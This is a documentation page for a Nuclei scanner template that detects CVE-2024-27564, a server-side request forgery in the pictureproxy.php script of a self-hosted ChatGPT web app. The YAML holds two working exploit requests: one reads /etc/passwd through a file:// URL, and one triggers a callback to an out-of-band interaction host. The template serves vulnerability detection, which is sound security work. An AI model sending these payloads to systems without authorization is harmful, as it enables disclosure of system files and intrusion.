ChatGPT个人专用版 - Server Side Request Forgery
ID: CVE-2024-27564
Severity: high
Author: DhiyaneshDK
Tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi
Description
Section titled “Description”A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.
YAML Source
Section titled “YAML Source”id: CVE-2024-27564
info: name: ChatGPT个人专用版 - Server Side Request Forgery author: DhiyaneshDK severity: high description: | A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter. reference: - https://github.com/dirk1983/chatgpt/issues/114 - https://nvd.nist.gov/vuln/detail/CVE-2024-27564 classification: cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: chanzhaoyu product: chatgpt_web fofa-query: "title=\"ChatGPT个人专用版\"" tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi
http: - method: GET path: - "{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd" - "{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}"
stop-at-first-match: true
matchers-condition: or matchers: - type: dsl dsl: - status_code == 200 - contains(header, "image/jpeg") - regex('root:.*:0:0:', body) condition: and
- type: dsl dsl: - contains(interactsh_protocol, "dns") - contains(header, "image/jpeg") - status_code == 200 condition: and# digest: 490a0046304402207d2ad17f0cdb85266d6729b06113bb23ceb83d34b045cf9288b000e7aac9f64b02200108a9e7843af4456286119228622ebb3336d8bd8bfeb6bac202df22427a2d41:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-27564.yaml"